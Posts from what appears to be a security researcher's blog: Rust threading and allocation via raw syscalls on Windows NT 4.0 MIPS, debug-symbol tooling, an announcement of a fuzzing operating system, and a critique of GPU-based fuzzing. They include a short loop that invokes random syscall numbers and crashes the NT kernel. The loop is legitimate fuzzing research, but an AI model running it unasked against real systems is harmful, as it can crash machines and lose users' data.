            Syscall::AllocateVirtualMemory as usize,
        )
    } as u32);

    // If success, return allocation otherwise return status
    if status.success() {
        Ok(addr as *mut u8)
    } else {
        Err(status)
    }
}
    
/// Release memory range
const MEM_RELEASE: u32 = 0x8000;

/// De-allocate virtual memory in the current process
pub unsafe fn munmap(mut addr: usize) -> Result<()> {
    // Region size
    let mut size = 0usize;

    // Perform syscall
    let status = NtStatus(syscall4(
        // [in] HANDLE ProcessHandle,
        !0,

        // [in, out] PVOID *BaseAddress,
        addr_of_mut!(addr) as usize,

        // [in, out] PSIZE_T RegionSize,
        addr_of_mut!(size) as usize,

        // [in] ULONG AllocationType,
        MEM_RELEASE as usize,

        // Syscall ID
        Syscall::FreeVirtualMemory as usize,
    ) as u32);

    // Return error on error
    if status.success() {
        Ok(())
    } else {
        Err(status)
    }
}

And voila. Now we can use Strings, Boxes, Vecs, BTreeMaps, and a whole list of other standard data structures in Rust. At this point, other than file I/O, networking, and threading, this environment is probably capable of running pretty much any generic Rust code, just by implementing two simple allocation functions. How cool is that!?
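
As a quick, hypothetical usage example (assuming extern crate alloc in the crate root), ordinary collections now just work on top of those two functions:

use alloc::{collections::BTreeMap, string::String, vec::Vec};

fn alloc_demo() {
    // All of these allocations bottom out in NtAllocateVirtualMemory()
    let mut counts: BTreeMap<String, usize> = BTreeMap::new();
    for word in ["nt", "mips", "nt"].iter() {
        *counts.entry(String::from(*word)).or_insert(0) += 1;
    }

    let squares: Vec<usize> = (0..10).map(|x| x * x).collect();
    print!("{:?} {:?}\n", counts, squares);
}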

Threading

Some terrible person in my chat just had to ask “what about threading support”. Of course, this could be an offhand comment that I dismiss or laugh at, but yeah, what about threading? After all, we want to write a fuzzer, and without threads it’ll be hard to hit those juicy, totally necessary on 1996 software, race conditions?!

Well, this threw us for a huge loop. First of all, how do we actually create threads in Windows, and next, how do we do it in a Rust-style way, using closures that can be join()ed to get the return result?

Creating threads on Windows

Unfortunately, creating threads on Windows requires the NtCreateThread() syscall. This is not documented, and honestly took a pretty long time to figure out. You don’t actually give it a function pointer to execute and a parameter, like most higher-level thread creation libraries do.

Instead, you actually give it an entire CONTEXT. In Windows development, the CONTEXT structure is a very-specific-to-your-architecture structure that contains all of the CPU register state. So, you actually have to figure out the correct CONTEXT shape for your architecture (usually there are multiple, controlled by heavy #ifdefs). This might have taken us an hour to actually figure out, I don’t remember.

On top of this, you also provide it the stack register. Yep, you heard that right, you have to create the stack for the thread yourself. This is yet another step that I wasn’t really expecting, and it added to the complexity.

Anyways, at the end of the day, you launch a new thread in your process, you give it a CPU context (and by nature a stack and target entry address), and let it run off and do its thing.

However, this isn’t very Rust-like. Rust allows you to optionally join() on a thread to get the return result from it; further, threads are started as closures, so you can pass in arbitrary parameters to the thread with super convenient syntax, either by move or by reference.

Threading in Rust

This leads to a hard-ish problem. How do we get Rust-style threads? Until we wrote this, I never really even thought about it. Initially we thought about some fancy static ways of doing it, but ultimately, due to using closures, you must put information on the heap. It’s obvious in hindsight, but if you want to move ownership of some of your stack locals into this thread, how are you possibly going to do that without storing it somewhere? You can’t let the thread use the parent’s stack, that wouldn’t work too well.

So, we implemented a spawn routine that would take in a closure (with the same constraints as Rust’s own std::thread::spawn), put the closure into a Box, turning it into a dynamically dispatched trait (vftables and friends), while moving all of the variables captured by the closure onto the heap.

We then can invoke NtCreateThread() with a stack that we created, point the thread at a simple trampoline and pass in a pointer to the raw backing of the Box. Then, in the trampoline, we can convert the raw pointer back into a Box and invoke it! Now we’ve run the closure in the thread!

Return values

Unfortunately, this only gets us execution of the closure. We still have to add the ability to get return values from the thread. This has a unique design problem: the return value has to be accessible to the thread which created it, while also being accessible to the thread itself to initialize. Since the creator of the thread can also just ignore the result, we can’t simply have the thread free the return storage when the creator doesn’t want it, as the thread won’t know that (or you’d have to communicate it).

So, we ended up using an Arc<>. This is an atomically reference-counted, heap-allocated structure in Rust, and it ensures that the value lives as long as there is at least one reference. This works perfectly for this situation: we give one copy of the Arc to the thread (ref count 1), and then another copy to the creator of the thread (ref count 2). This way, the only way the storage for the Arc is freed is if both the thread and the creator are done with it.

Further, we need to ensure some level of synchronization with the thread, as the creator cannot check this return value until the thread has initialized it. Luckily, we can accomplish this in two ways. One, when a user join()s on a thread, it blocks until that thread finishes execution. To do this we invoke NtWaitForSingleObject(), which takes in a HANDLE (given to us when we created the thread) and a timeout. By setting an infinite timeout we can ensure that we do not do anything until the thread is done.

This leaves some implementation specific details about threads up in the air, like what happens with thread early termination, crashes, etc. Thus, we want to also ensure the return value has been updated in another way.

We did this by being creative with the Arc reference count. The Arc reference count can only be decreased by the thread when the Arc goes out of scope, and due to the way we designed the thread, this can only happen once the value has been successfully initialized.

Thus, in our main thread, we can call Arc::try_unwrap() on our return value, this will only succeed if we are the only reference to the Arc, thus atomically ensuring that the thread has successfully updated the return value!
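
Putting that together, join() ends up being quite small. Here’s a sketch of roughly what it looks like (the JoinHandle layout matches the spawn() shown further down; the wait() wrapper around NtWaitForSingleObject() is an assumption):

use core::cell::UnsafeCell;
use core::mem::MaybeUninit;
use alloc::sync::Arc;

/// Handle to a spawned thread: the thread handle plus the shared return slot
pub struct JoinHandle<T>(Handle, Arc<UnsafeCell<MaybeUninit<T>>>);

impl<T> JoinHandle<T> {
    /// Block until the thread exits, then take its return value
    pub fn join(self) -> Option<T> {
        // Hypothetical wrapper around NtWaitForSingleObject() with an
        // infinite timeout; the thread has finished (and dropped its copy
        // of the Arc) by the time this returns
        crate::syscall::wait(&self.0).ok()?;

        // If we hold the only remaining reference, the thread must have
        // initialized the return value, so it is safe to assume init
        Arc::try_unwrap(self.1).ok()
            .map(|cell| unsafe { cell.into_inner().assume_init() })
    }
}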

Now we have full Rust-style threading, ala:

fn main() -> Result<(), ()> {
    let a_local_value = 5;

    let thr = syscall::spawn(move || {
        println!("Hello world from Rust thread {}", a_local_value);
        core::cell::RefCell::new(22)
    }).unwrap();

    println!("Return val: {:?}", thr.join().unwrap());

    Ok(())
}
Serving 23500 bytes to 192.168.1.2:46026
---------------------------------
Hello world from Rust thread 5
Return val: RefCell { value: 22 }

HOW COOL IS THAT!? RIGHT!? This is on MIPS for Windows NT 4.0, an operating system from almost 20 years prior to Rust even existing! We have all the safety and fun features of bounds checking, dynamically growing vectors, scope-based dropping of references, locks, and allocations, etc.

Cleaning it all up

Unfortunately, we have a few leaks. We leak the handle that we got when we created the thread, and we also leak the stack of the thread itself. This is actually a tough-ish problem. How do we free the stack of a thread when we don’t know when it exits (as the creator of the thread might never join() it)?

Well, the first problem is easy. Implement a Handle type, implement a Drop handler on it, and Rust will automatically clean up the handle when it goes out of scope by calling NtClose() in our Drop handler. Phew, that’s easy.
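
A sketch of that Handle type (the Close syscall number and the one-argument syscall wrapper are assumptions following the patterns above; the usize newtype matches how Handle is used in the spawn() code below):

/// Owned NT HANDLE which closes itself when it goes out of scope
pub struct Handle(pub usize);

impl Drop for Handle {
    fn drop(&mut self) {
        // NtClose() the handle; there's nothing useful to do if this fails
        unsafe {
            crate::syscall::syscall1(self.0, Syscall::Close as usize);
        }
    }
}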

Freeing the stack is a bit harder, but we decided that the best route would be to have the thread free its own stack. This isn’t too hard; it just means that we must free the stack and exit the thread without touching the stack, ideally without using any globals, as that would have race conditions.

Luckily, we can do this just fine if we implement the syscalls we need directly in one assembly block where we know we have full control.

// Region size
let mut rsize = 0usize;

// Free the stack and then exit the thread. We do this in one assembly
// block to ensure we don't touch any stack memory during this stage
// as we are freeing the stack.
unsafe {
    asm!(r#"
        // Set the link register
        jal 2f

        // Exit thread
        jal 3f
        break

    2:
        // NtFreeVirtualMemory()
        li $v0, {free}
        syscall

    3:
        // NtTerminateThread()
        li $v0, {terminate}
        li $a0, -2 // GetCurrentThread()
        li $a1, 0  // exit code
        syscall

    "#, terminate = const Syscall::TerminateThread   as usize,
        free      = const Syscall::FreeVirtualMemory as usize,
        in("$4") !0usize,
        in("$5") addr_of_mut!(stack),
        in("$6") addr_of_mut!(rsize),
        in("$7") MEM_RELEASE, options(noreturn));
}

Interestingly, we do technically have to pass a stack variable to NtFreeVirtualMemory(), but that’s actually okay: either the kernel updates that variable before freeing the stack, and thus it’s fine, or it updates the variable as an untrusted user pointer after freeing the stack and returns with an error. We don’t really care either way, as the stack is freed. Then, all we have to do is call NtTerminateThread() and we’re all done.

Huzzah, fancy Rust threading, no memory leaks, (hopefully) no race conditions.

/// Spawn a thread
///
/// MIPS specific due to some inline assembly as well as MIPS-specific context
/// structure creation.
pub fn spawn<F, T>(f: F) -> Result<JoinHandle<T>>
        where F: FnOnce() -> T,
              F: Send + 'static,
              T: Send + 'static {
    // Holder for returned client handle
    let mut handle = 0usize;

    // Placeholder for returned client ID
    let mut client_id = [0usize; 2];

    // Create a new context
    let mut context: Context = unsafe { core::mem::zeroed() };

    // Allocate and leak a stack for the thread
    let stack = vec![0u8; 4096].leak();

    // Initial TEB, maybe some stack stuff in here!?
    let initial_teb = [0u32; 5];

    /// External thread entry point
    extern fn entry<F, T>(func:      *mut F,
                          ret:       *mut UnsafeCell<MaybeUninit<T>>,
                          mut stack:  usize) -> !
            where F: FnOnce() -> T,
                  F: Send + 'static,
                  T: Send + 'static {
        // Create a scope so that we drop `Box` and `Arc`
        {
            // Re-box the FFI'd type
            let func: Box<F> = unsafe {
                Box::from_raw(func)
            };

            // Re-box the return type
            let ret: Arc<UnsafeCell<MaybeUninit<T>>> = unsafe {
                Arc::from_raw(ret)
            };

            // Call the closure and save the return
            unsafe { (&mut *ret.get()).write(func()); }
        }

        // Region size
        let mut rsize = 0usize;

        // Free the stack and then exit the thread. We do this in one assembly
        // block to ensure we don't touch any stack memory during this stage
        // as we are freeing the stack.
        unsafe {
            asm!(r#"
                // Set the link register
                jal 2f

                // Exit thread
                jal 3f
                break

            2:
                // NtFreeVirtualMemory()
                li $v0, {free}
                syscall

            3:
                // NtTerminateThread()
                li $v0, {terminate}
                li $a0, -2 // GetCurrentThread()
                li $a1, 0  // exit code
                syscall

            "#, terminate = const Syscall::TerminateThread   as usize,
                free      = const Syscall::FreeVirtualMemory as usize,
                in("$4") !0usize,
                in("$5") addr_of_mut!(stack),
                in("$6") addr_of_mut!(rsize),
                in("$7") MEM_RELEASE, options(noreturn));
        }
    }

    let rbox = unsafe {
        /// Control context
        const CONTEXT_CONTROL: u32 = 1;

        /// Floating point context
        const CONTEXT_FLOATING_POINT: u32 = 2;

        /// Integer context
        const CONTEXT_INTEGER: u32 = 4;

        // Set the flags for the registers we want to control
        context.context.bits64.flags =
            CONTEXT_CONTROL | CONTEXT_FLOATING_POINT | CONTEXT_INTEGER;

        // Thread entry point
        context.context.bits64.fir = entry::<F, T> as usize as u32;

        // Set `$a0` argument
        let cbox: *mut F = Box::into_raw(Box::new(f));
        context.context.bits64.int[4] = cbox as u64;
        
        // Create return storage in `$a1`
        let rbox: Arc<UnsafeCell<MaybeUninit<T>>> =
            Arc::new(UnsafeCell::new(MaybeUninit::uninit()));
        context.context.bits64.int[5] = Arc::into_raw(rbox.clone()) as u64;

        // Pass in stack in `$a2`
        context.context.bits64.int[6] = stack.as_mut_ptr() as u64;

        // Set the 64-bit `$sp` to the end of the stack
        context.context.bits64.int[29] =
            stack.as_mut_ptr() as u64 + stack.len() as u64;
        
        rbox
    };

    // Create the thread
    let status = NtStatus(unsafe {
        syscall8(
            // OUT PHANDLE ThreadHandle
            addr_of_mut!(handle) as usize,

            // IN ACCESS_MASK DesiredAccess
            0x1f03ff,

            // IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
            0,

            // IN HANDLE ProcessHandle
            !0,

            // OUT PCLIENT_ID ClientId
            addr_of_mut!(client_id) as usize,

            // IN PCONTEXT ThreadContext,
            addr_of!(context) as usize,

            // IN PINITIAL_TEB InitialTeb
            addr_of!(initial_teb) as usize,

            // IN BOOLEAN CreateSuspended
            0,

            // Syscall number
            Syscall::CreateThread as usize
        )
    } as u32);

    // Convert error to Rust error
    if status.success() {
        Ok(JoinHandle(Handle(handle), rbox))
    } else {
        Err(status)
    }
}

Fun oddities

While doing this work it was fun to notice that it seems that threads do not die upon crashing. It would appear that the thread initialization thunk that Windows normally shims in when you create a thread must register some sort of exception handler which then fires and the thread itself reports the information to the kernel. At least in this version of NT, the thread did not die, and the process didn’t crash as a whole.

“Fuzzing” Windows NT

Windows NT 4.0 blue screen of death

Of course, the point of this project was to fuzz Windows NT. Well, it turns out that literally the very first thing we did… randomly invoke a syscall, was all it took.

/// Worker thread for fuzzing
fn worker(id: usize) {
    // Create an RNG
    let rng = Rng::new(0xe06fc2cdf7b80594 + id as u64);

    loop {
        unsafe {
            syscall::syscall0(rng.next() as usize);
        }
    }
}

Yep, that’s all it took.

Debugging Windows NT Blue Screens

Unfortunately, we’re in a pretty legacy system and our tools for debugging are limited. Especially for MIPS executables for Windows. Turns out that Ghidra isn’t able to load MIPS PEs at all, and Binary Ninja has no support for the debug information.

We started by writing a tool that would scrape the symbol output and information from mipskd (which works really similar to modern KD), but unfortunately one of the members of my chat claimed a chat reward to have me drop whatever I was doing and rewrite it in Rust.

At the time, we were writing a hacky batch script to dump symbols in a way we could save to disk, rip out of the VM, and then use in Binary Ninja. However, well, now I had to do this all in Rust.

Parsing DBG COFF

The debug files that ship with Windows NT on the ISO are DI magic-ed files. These are separated debug information with a slightly specialized debug header with COFF symbol information. This format is actually relatively well documented, so writing the parser wasn’t too much effort. Most of the development time was trying to figure out how to correlate source line information to addresses. Ultimately, the only possible method to do this that I found was to use the statefulness of the sequence of debug symbol entries to associate the current file definition (in sequence with debug symbols) with symbols that are described after it.

I don’t know if this is the correct design, as I didn’t find it clearly documented anywhere. It is standardized in a few documents, but these DBG files did not follow that format.

I ultimately wrote coff_nm for this parsing, which simply writes to stdout with the format:

F <addr> <function>
G <addr> <global>
S <addr> <source>:<line>

Binary Ninja

Binary Ninja with Pinball.exe open and symbolized

(Fun fact, yes, you can find PPC, MIPS, and Alpha versions of the Space Cadet Pinball game you know and love)

I wrote a very simple Binary Ninja script that allowed me to import this debug information into the program:

from binaryninja import *
import re, subprocess

def load_dbg_file(bv, function):
    rex = re.compile("^([FGS]) ([0-9a-f]{8}) (.*)$")

    # Prompt for debug file input
    dbg_file = interaction \
        .get_open_filename_input("Debug file",
        "COFF Debug Files (*.dbg *.db_)")

    if dbg_file:
        # Parse the debug file
        output = subprocess.check_output(["dbgparse", dbg_file]).decode()
        for line in output.splitlines():
            (typ, addr, name) = rex.match(line).groups()
            addr = bv.start + int(addr, 16)

            (mangle_typ, mangle_name) = demangle.demangle_ms(bv.arch, name)
            if type(mangle_name) == list:
                mangle_name = "::".join(mangle_name)

            if typ == "F":
                # Function
                bv.create_user_function(addr)
                bv.define_user_symbol(Symbol(SymbolType.FunctionSymbol, addr, mangle_name, raw_name=name))
                if mangle_typ != None:
                    bv.get_function_at(addr).function_type = mangle_typ
            elif typ == "G":
                # Global
                bv.define_user_symbol(Symbol(SymbolType.DataSymbol, addr, mangle_name, raw_name=name))
            elif typ == "S":
                # Sourceline
                bv.set_comment_at(addr, name)

        # Update analysis
        bv.update_analysis()

PluginCommand.register_for_address("Load COFF DBG file", "Load COFF .DBG file from disk", load_dbg_file)

This simply prompts the user for a file, invokes the dbgparse tool, parses the output, and then uses Binary Ninja’s demangling to demangle names and extract type information (for mangled names). This script tells Binja what functions we know exist, their names, and their typing (from mangling information); it also applies symbols for globals, and finally it applies source line information as comments.

Thus, we now have a great environment for reading and reviewing NT code for analyzing the crashes we find with our “fuzzer”!

Conclusion

Well, this has gotten a lot longer than expected, and it’s also 5am so I’m just going to upload this as is, so hopefully it’s not a mess as I’m not reading through it to check for errors. Anyways, I hope you enjoyed this write up of the 3 streams so far on this content. It’s been a really fun project, and I hope that you tune into my live streams and watch the next steps unfold!

~Gamozo

FuzzOS

6 December 2020 at 23:11

Summary

We’re going to work on an operating system which is designed specifically for fuzzing! This is going to be a streaming series for most of December which will cover making a new operating system with a strong focus on fuzzing. This means that things like the memory manager, determinism, and scalability will be the most important parts of the OS, and a lot of effort will go into making them super fast!

When

Streaming will start sometime on Thursday, December 10th, probably around 18:00 UTC, but the streams will be at relatively random times on relatively random days. I can’t really commit to specific times!

Streams will likely be 4-5 days a week (probably M-F), and probably 8-12 hours in length. We’ll see, who knows, depends how much fun we have!

Where

You’ll be able to find the streams live on my Twitch Channel, and if you’re unlucky and miss the streams, you’ll be able to find the recordings on my YouTube Channel! Don’t forget to like, comment, and subscribe, of course.

What

So… ultimately, I don’t really know what all will happen. But, I can predict a handful of things that we’ll do. First of all, it’s important to note that these streams are not training material. There is no prepared script, materials, flow, etc. If we end up building something totally different, that’s fine and we’re just going with the flow. There is no requirement of completing this project, or committing to certain ways the project will be done. So… with that aside.

We’ll be working on making an operating system, specifically for x86-64 (Intel flavor processors at the start, but AMD should work in non-hypervisor mode). This operating system will be designed for fuzzing, which means we’ll want to focus on making virtual memory management extremely fast. This is the backbone of most performant fuzzing, and we’ll need to be able to map in, unmap, and restore pages as they are modified by a fuzz case.

To keep you on the edge of your toes, I’ll first start with the boring things that we have to do.

OS

We have to make an operating system which boots. We’re gonna make a UEFI kernel, and we might dabble in running it on ARM64 as most of our code will be platform agnostic. But, who knows. It’ll be a pretty generic kernel, I’m mainly going to develop it on bare metal, but of course, we’ll make sure it runs on KVM/Xen/Hyper-V such that it can be used in a cloud environment.

ACPI

We’re gonna need to write ACPI table parsers such that we can find the NUMA locality of memory and CPUs on the system. This will be critical to getting a high performance memory manager that scales with cores.

Multi-processing

Of course, the kernel will support multiple cores, as otherwise it’s kinda useless for compute.

10gbit networking + TCP stack

Since I never work with disks, I’m going to follow my standard model of just using the network as general purpose whatever. To do this, we’ll need 10gbit network drivers and a TCP stack such that we can communicate with the rest of a network. Nothing too crazy here, we’ll probably borrow some code from Chocolate Milk.


Interesting stuff

Okay, that stuff was boring, lets talk about the fun parts!

Exotic memory model

Since we’ll be “snapshotting” memory itself, we need to make sure things like pointers aren’t a problem. The fastest, easiest, and best solution to this, is simply to make sure the memory always gets loaded at the same address. This is no problem for a single core, but it’s difficult for multiple cores, as they need to have copies of the same data mapped at the same location.

What’s the solution? Well of course, we’ll have every single core on the system running its own address space. This means there is no shared memory between cores (with some very, very minor exceptions). Not only does this lead to exceptionally high memory access performance (due to caches only being in the exclusive or shared states), but it also means that shared (mutable) memory will not be a thing! This means that we’ll do all of our core synchronization through message passing, which is higher latency in the best case than shared memory models, but with an advantage of scaling much better. As long as our messages can be serialized to TCP streams, that means we can scale across the network without any effort.

This has some awesome properties since we no longer need any locks to our page tables to add and remove entries, nor do we need to perform any TLB shootdowns, which can cost tens of thousands of cycles.

I used this model in Sushi Roll, and I really miss it. It had incredibly good performance properties and forced a bit more thought about sharing information between cores.
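
To make the message passing a bit more concrete, here’s a minimal sketch (with made-up message types and a hand-rolled wire format, none of this is the real design) of what core-to-core communication could look like once everything is serialized to a TCP stream. The nice property is that the exact same code path works whether the peer is another core on the same box or a machine across the network.

use std::convert::TryInto;
use std::io::{self, Read, Write};
use std::net::TcpStream;

/// Hypothetical inter-core message; real messages would carry work items,
/// corpus updates, statistics, etc.
enum Message {
    /// Report newly observed coverage at a given address
    Coverage(u64),
    /// Report the number of fuzz cases performed since the last report
    Cases(u64),
}

/// Serialize a message as a tiny fixed-size packet with a one-byte tag
fn send_message(stream: &mut TcpStream, msg: &Message) -> io::Result<()> {
    let (kind, val) = match msg {
        Message::Coverage(addr) => (0u8, *addr),
        Message::Cases(count)   => (1u8, *count),
    };

    let mut packet = [0u8; 9];
    packet[0] = kind;
    packet[1..9].copy_from_slice(&val.to_le_bytes());
    stream.write_all(&packet)
}

/// Receive one message, the mirror of `send_message`
fn recv_message(stream: &mut TcpStream) -> io::Result<Message> {
    let mut packet = [0u8; 9];
    stream.read_exact(&mut packet)?;
    let val = u64::from_le_bytes(packet[1..9].try_into().unwrap());
    Ok(match packet[0] {
        0 => Message::Coverage(val),
        _ => Message::Cases(val),
    })
}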

Scaling

As with most things I write, linear scaling will be required, and scaling across the network is just implied, as it’s required for really any realistic application of fuzzing.

Fast and differential memory snapshotting

So far, none of these things are super interesting. I’ve had many OSes that do these things well, for fuzzing, for quite a long time. However, I’ve never made these memory management techniques into a true data structure, rather I use them as needed manually. I plan to make the core of this operating system a combination of Rust procedural macros and virtual memory management tricks that allow arbitrary data structures to be stored in a tree-shaped checkpointed structure.

This will allow for fast transitions between the different states of the structure as they were snapshotted. This will be done by leveraging the dirty bits in the page tables, and creating an allocator that will allocate in a pool of memory which will be saved and restored on snapshots. This memory will be treated as an opaque blob internally, and thus it can hold any information you want, device state, guest memory state, register state, something completely unrelated to fuzzing, won’t matter. To handle nested structures (or more specifically, pointers in structures which are to be tracked), we’ll use a Rust procedural macro to disallow untracked pointers within tracked structures.

Effectively, we’re going to heavily leverage the hardware’s MMU to differentially snapshot, teleport between, and restore blobs of memory. For fuzzing, this is necessary as a way to hold guest memory state and register state. By treating this opaquely, we can focus on doing the MMU aspects really well, and stop worrying about special casing all these variables that need to be restored upon resets.
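
As a rough illustration of the dirty-bit idea, here’s a deliberately simplified sketch that uses a software-only “page table” stand-in; a real implementation would read and clear the dirty bits in the actual hardware page tables (and deal with TLBs), but the restore logic has the same shape.

const PAGE_SIZE: usize = 4096;

/// A fake, software-only page entry used purely for illustration
struct Page {
    data:  Box<[u8; PAGE_SIZE]>,
    dirty: bool,
}

struct Memory {
    pages: Vec<Page>,
}

impl Memory {
    /// Take a snapshot of the current state (a full copy, done once)
    fn snapshot(&self) -> Vec<Box<[u8; PAGE_SIZE]>> {
        self.pages.iter().map(|page| page.data.clone()).collect()
    }

    /// Differentially restore: only pages which were dirtied since the
    /// snapshot get copied back, and their dirty bits are cleared. For a
    /// short fuzz case this touches a handful of pages, not all of memory.
    fn restore(&mut self, snapshot: &[Box<[u8; PAGE_SIZE]>]) {
        for (page, orig) in self.pages.iter_mut().zip(snapshot.iter()) {
            if page.dirty {
                page.data.copy_from_slice(&orig[..]);
                page.dirty = false;
            }
        }
    }
}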

Linux emulator

Okay, so all of that is kinda to make room for developing high performance fuzzers. In my case, I want this mainly for a new rewrite of vectorized emulation, but to make it interesting for others, we’re going to implement a Linux emulator capable of running QEMU.

This means that we’ll be able to (probably statically only) compile QEMU. Then we can take this binary, and load it into our OS and run QEMU in our OS. This means we can control the syscall responses to the requests QEMU makes. If we do this deterministically (we will), this means QEMU will be deterministic. Which thus means, the guest inside of QEMU will also be deterministic. You see? This is a technique I’ve used in the past, and works exceptionally well. We’ll definitely outperform Linux’s handling of syscalls, and we’ll scale better, and we’ll blow Linux away when it comes to memory management.
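
As a minimal sketch of what the deterministic syscall handling could look like: the `Emu` state and dispatch below are hypothetical (the syscall numbers shown follow x86-64 Linux), and the only point being made is that nothing the guest can observe ever comes from the host.

/// Hypothetical emulator state; fake time is advanced deterministically
/// (e.g. per query or per instruction), never read from the host clock
struct Emu {
    fake_time_ns: u64,
}

impl Emu {
    fn handle_syscall(&mut self, number: u64, _args: &[u64; 6]) -> i64 {
        match number {
            // clock_gettime: write a fake, monotonically advancing time into
            // the guest timespec (elided here) and report success
            228 => {
                self.fake_time_ns += 1_000;
                0
            }
            // getrandom: report success; the "random" bytes written to the
            // guest would be a fixed pattern, so hash seeds etc. are stable
            318 => 0,
            // getpid: always the same pid
            39 => 1234,
            // anything unimplemented should fail loudly so we notice
            _ => panic!("unhandled syscall {}", number),
        }
    }
}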

KVM emulator + hypervisor

So, I have no idea how hard this would be, but from about 5 minutes of skimming the interwebs, it seems that I could pretty easily write a hypervisor in my OS that emulates KVM ioctls. Meaning QEMU would just think KVM is there, and use it!

This will give us full control of QEMU’s determinism, syscalls, performance, and reset speeds… without actually having to modify QEMU code.

That’s it

So that’s the plan. An OS + fast MMU code + hypervisor + Linux emulator, to allow us to deterministically run anything QEMU can run, which is effectively everything. We’ll do this with performance likely into the millions of VM resets per second per core, scaling linearly with cores, including over the network, to allow some of the fastest general purpose fuzzing the world has ever seen :D

FAQ

Some people have asked questions on the internet, and I’ll post them here:

Hackernews Q1

Q:

Huh. So my initial response was, "why on earth would you need a whole OS for that", but memory snapshotting and improved virtual memory performance might actually be a good justification. Linux does have CRIU which might be made to work for such a purpose, but I could see a reasonable person preferring to do it from a clean slate. On the other hand, if you need qemu to run applications (which I'm really unclear about; I can't tell if the plan is to run stuff natively on this OS or just to provide enough system to run qemu and then run apps on linux on qemu) then I'm surprised that it's not easier to just make qemu do what you want (again, I'm pretty sure qemu already has its own memory snapshotting features to build on).

Of course, writing an OS can be its own reward, too:) 

A:

Oooh, wasn't really expecting this to make it to HN cause it was meant to be more of an announcement than a description.

But yes, I've done about 7 or 8 operating systems for fuzzing in the past and it's a massive performance (and cleanliness) cleanup. This one is going to be like an operating system I wrote 2-3 years ago for my vectorized emulation work.

To answer your QEMU questions, the goal is to effectively build QEMU with MUSL (just to make it static so I don't need a dynamic loader), and modify MUSL to turn all syscalls to `call` instructions. This means a "syscall" is just a call to another area, which will be my Rust Linux emulator. I'll implement the bare minimum syscalls (and enum variants to those syscalls) to get QEMU to work, nothing more. The goal is not to run Linux applications, but run a QEMU+MUSL combination which may be modified lightly if it means a lower emulation burden (eg. getting rid of threading in QEMU [if possible] so we can avoid fork())

The main point of this isn't performance, it's determinism, but that is a side effect. A normal syscall instruction involves a context switch to the kernel, potentially cr3 swaps depending on CPU mitigation configuration, and the same to return back. This can easily be hundreds of cycles. A `call` instruction to something that handles the syscall is on the order of 1-4 cycles.

While for syscalls this isn't a huge deal, it's even more emphasized when it comes to KVM hypercalls. Transitions to a hypervisor are very expensive, and in this case, the kernel, the hypervisor, and QEMU (eg. device emulation) will all be running at the same privilege level and there won't be a weird QEMU -> OS -> KVM -> other guest OS device -> KVM -> OS -> QEMU transition every device interaction.

But then again, it's mainly for determinism. By emulating Linux deterministically (eg. not providing entropy through times or other syscall returns), we can ensure that QEMU has no source of external entropy, and thus, will always do the same thing. Even if it uses a random-seeded hash table, the seed would be derived from syscalls, and thus, will be the same every time. This determinism means the guest always will do the same thing, to the instruction. Interrupts happen on the same instructions, context switches do, etc. This means any bug, regardless of how complex, will reproduce every time.

All of this syscall emulation + determinism I have also done before, in a tool called tkofuzz that I wrote for Microsoft. That used Linux emulation + Bochs, and it was written in userspace. This has proven incredibly successful and it's what most researchers are using at Microsoft now. That being said, Bochs is about 100x slower than native execution, and now that people have gotten a good hold of snapshot fuzzing (there's a steep learning curve), it's time to get a more performant implementation. With QEMU we get this with a JIT, which at least gets us a 2-5x improvement over Bochs while still "emulating", but even more value could be found if we get the KVM emulation working and can use a hypervisor. That being said, I do plan to support a "mode" where guests which do not touch devices (or more specifically, snapshots which are taken after device I/O has occurred) will be able to run without QEMU at all. We're really only using QEMU for device emulation + interrupt control, thus, if you take a snapshot to a function that just parses everything in one thread, without process IPC or device access (it's rare, when you "read" from a disk, you're likely just hitting OS RAM caches, and thus not devices), we can cut out all the "bloat" of QEMU and run in a very very thin hypervisor instead.

In fuzzing it's critical to have ways to quickly map and unmap memory as most fuzz cases last for hundreds of microseconds. This means after a few hundred microseconds, I want to restore all memory back to the state "before I handled user input" and continue again. This is extremely slow in every conventional operating system, and there's really no way around it. It's of course possible to make a driver or use CRIU, but these are still not exactly the solution that is needed here. I'd rather just make an OS that trivially runs in KVM/Hyper-V/Xen, and thus can run in a VM to get the cross-platform support, rather than writing a driver for every OS I plan to use this on.

Stay cute, ~gamozo 

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Some thoughts on ToB’s GPU-based fuzzing

23 October 2020 at 07:11

The blog

The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!

Let’s build a high-performance fuzzer with GPUs!

Summary

In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called remill, which is designed for binary translation. Remill alone is incredibly impressive.

The target they picked as a benchmark is the BPF packet filtering code in libpcap, pcap_filter_with_aux_data. This function is pretty simple, and it executes a compiled BPF filter and uses it to extract information and filter a packet.

The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handing virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!

I’m super excited about this blog, mainly because it’s very similar to vectorized emulation that I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this blog goes into some criticisms, it’s important to note that the research is only just starting, there is much progress to be had! It’s also important to note that this research has been being done by Ryan for only 2 months. That is incredible progress.


The Problems

Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.

The comparison

In the blog, the comparison being done and being presented is largely about comparing the performance of libfuzzer, against their GPU based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second), per unit US dollar. This comparison is largely to emphasize the cost efficiencies of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.

The hardware they’re testing on is 2 different Google Cloud Compute nodes with various specs. The one used to benchmark libfuzzer is an n1-standard-8; this is a 4 core, 8 hyperthread, Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.

The other machine they’re testing on, for their GPU metrics, is a NVIDIA Tesla T4 single GPU compute node from Google Cloud Project. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking into consideration their costs.

